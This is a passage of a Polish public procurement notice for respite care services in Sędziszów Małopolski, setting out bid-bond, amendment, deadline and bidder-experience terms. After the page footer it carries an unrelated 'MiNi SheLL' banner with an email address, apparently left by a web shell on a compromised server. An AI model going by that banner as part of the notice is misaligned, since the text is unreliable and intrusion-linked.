ubezpieczeniowych;<br/>4)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2020 r. poz. 299).<br/>4.	Wadium w formie pieniądza należy wnieść przelewem na konto Banku Spółdzielczego w Sędziszowie Młp. nr rachunku: 65 9172 0003 0003 3138 2000 0060 z dopiskiem: „Wadium - nr postępowania FK.261.I.2.2021”.<br/>UWAGA: Za termin wniesienia wadium w formie pieniężnej zostanie przyjęty termin uznania rachunku Zamawiającego.<br/>5.	Wadium wnoszone w formie poręczeń lub gwarancji musi być złożone jako oryginał gwarancji lub poręczenia w postaci elektronicznej i spełniać co najmniej poniższe wymagania:<br/>1)	musi obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę określone w ustawie Pzp.,<br/>2)	z jej treści powinno jednoznacznej wynikać zobowiązanie gwaranta do zapłaty całej kwoty wadium,<br/>3)	powinno być nieodwołalne i bezwarunkowe oraz płatne na pierwsze żądanie,<br/>4)	termin obowiązywania poręczenia lub gwarancji nie może być krótszy niż termin związania ofertą (z zastrzeżeniem iż pierwszym dniem związania ofertą jest dzień składania ofert),<br/>5)	w treści poręczenia lub gwarancji powinna znaleźć się nazwa oraz numer przedmiotowego postępowania,<br/>6)	beneficjentem poręczenia lub gwarancji jest: Miejsko - Gminny Ośrodek Pomocy Społecznej w Sędziszowie Małopolskim,<br/>7)	w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (art. 58 Pzp), Zamawiający wymaga aby poręczenie lub gwarancja obejmowała swą treścią (tj. zobowiązanych z tytułu poręczenia lub gwarancji) wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia lub aby z jej treści wynikało, że zabezpiecza ofertę Wykonawców wspólnie ubiegających się<br/>o udzielenie zamówienia (konsorcjum).<br/>6.	Oferta wykonawcy, który nie wniesie wadium, wniesie wadium w sposób nieprawidłowy lub nie utrzyma wadium nieprzerwanie do upływu terminu związania ofertą lub złoży wniosek o zwrot wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3 Pzp zostanie odrzucona.<br/>7.	Zasady zwrotu oraz okoliczności zatrzymania wadium określa art. 98 Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>2.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenie, o którym mowa w Rozdziale XII ust. 11 pkt 3 SWZ, składa każdy<br/>z wykonawców. Oświadczenie to potwierdza brak podstaw wykluczenia.<br/>3.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które dostawy wykonają poszczególni wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Strony dopuszczają następujące zmiany w treści umowy:<br/>1)	zmiana kwoty wynagrodzenia (stawka za jedną godzinę usługi) – w przypadku gdy ulegną zmianie przepisy prawa mające wpływ na jego wysokość (np. urzędowa zmiana stawek podatku VAT),<br/>2)	ilości osób dla których będzie świadczona usługa opieki wytchnieniowej, która może ostatecznie ulec zmianie w trakcie realizacji przedmiotu zamówienia - zmiana ta może wynikać z powodu choroby, rezygnacji z projektu, zmiany miejsca zamieszkania, śmierci Uczestnika etc., <br/>3)	zwiększenia ilości godzin w danym miesiącu - zmiana ta może wynikać ze zwiększenia wsparcia uczestnika projektu,<br/>4)	zmniejszenia ilości godzin w danym miesiącu - zmiana ta może wynikać z powodu choroby, rezygnacji z projektu, zmiany miejsca zamieszkania, etc., osoby/osób będącej/będących uczestnikiem/uczestnikami projektu,<br/>5)	Zamawiający zastrzega sobie możliwość zmniejszenia lub zwiększenia ilości godzin do 30% w stosunku do wykazanych w SWZ ilości godzin, z tego tytułu Wykonawcy nie przysługują żadne roszczenia finansowe ani prawne. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <p class="mb-0">obejmujące, zgodnie z art. 96 ustawy: - aspekty społeczne</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-07-05 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz ze wszystkimi wymaganymi oświadczeniami i dokumentami należy złożyć za pośrednictwem platformy pod adresem: https://platformazakupowa.pl/pn/sedziszowmalopolski</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-07-05 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-08-03</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> podadresem: https://platformazakupowa.pl/pn/sedziszowmalopolski lub poczty elektronicznej,<br/>nawskazany w pkt 3 adres e-mail. Sposób sporządzenia dokumentów elektronicznych musi<br/>byćzgody z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30<br/>grudnia2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz<br/>wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji<br/>elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z<br/>2020 poz. 2452) oraz rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia<br/>2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub<br/>oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz. U. z 2020 poz.<br/>2415); Dodatkowe informacje: 1. Zamawiający zawiera umowę w sprawie zamówienia<br/>publicznego w terminie nie krótszym niż 5 dni od dnia przesłania zawiadomienia o wyborze<br/>najkorzystniejszej oferty.2. Zamawiający może zawrzeć umowę w sprawie zamówienia<br/>publicznego przed upływem terminu, o którym mowa w ust. 1, jeżeli w postępowaniu o udzielenie<br/>zamówienia prowadzonym w trybie podstawowym złożono tylko jedną ofertę. 3. W przypadku<br/>wyboru oferty złożonej przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>Zamawiający zastrzega sobie prawo żądania przed zawarciem umowy w sprawie zamówienia<br/>publicznego umowy regulującej współpracę tych Wykonawców. 4. Jeżeli wykonawca, którego<br/>oferta została wybrana jako najkorzystniejsza,uchyla się od zawarcia umowy w<br/>sprawie zamówienia publicznego lub nie wnosi wymaganego zabezpieczenia należytego<br/>wykonania<br/>umowy, zamawiający może dokonać ponownego badania i oceny ofert spośród ofert<br/>pozostałych<br/>w postępowaniu wykonawców oraz wybrać najkorzystniejszą ofertę albo unieważnić<br/>postępowanie.<br/>5. Wykonawca na co najmniej 2 dni przed podpisaniem umowy zobowiązany będzie przedłożyć Zamawiającemu wykaz osób (opiekunów) przewidzianych do świadczenia usług oraz kopie dokumentów potwierdzających kwalifikacje zawodowe, staż<br/>i doświadczenie tych osób, wskazanych w pkt 17.28 SWZ oraz wykaz usług (o których mowa w pkt 24 SWZ) wraz z podaniem przedmiotu (w tym ilości godzin każdej usługi), wartości, dat wykonania i podmiotów na rzecz, których usługi zostały wykonane lub są wykonywane wraz z załączeniem dowodów określających czy te usługi zostały wykonane lub są wykonywane należycie; przy czym dowodami, o których mowa, są: referencje, bądź inne dokumenty wystawione przez podmiot, na rzecz którego dostawy/usługi były wykonywane/są wykonywane, a jeżeli z uzasadnionej przyczyny<br/>o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy. W przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert - Wymagane doświadczenie Wykonawcy: Wykonawca musi wykazać, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie Wykonawca zrealizował co najmniej 3 usługi (1 usługa rozumiana jako 1 zrealizowana umowa) polegające na świadczeniu usług asystenckich lub opiekuńczych w ilości co najmniej 2 000 godzin każda usługa. 6. Jeżeli Wykonawca nie złoży dokumentów, o których mowa w pkt 5 zawarcie umowy będzie niemożliwe z przyczyn leżących po stronie wykonawcy.<br/>7. TERMIN WYKONANIA ZAMÓWIENIA:<br/>do 6 miesięcy od dnia udzielenia zamówienia (podpisania umowy), jednak nie później niż do 31.12.2021 r.<br/>8. Świadczenie usługi opieki wytchnieniowej w celu wsparcia członków rodzin lub opiekunów osób z niepełnosprawnością – edycja 2021 finansowanego ze środków Programu Ministra Rodziny i Polityki Społecznej – „Opieka wytchnieniowa” – edycja 2021 w ramach środków finansowanych z Funduszu Solidarnościowego.</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-06-25 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com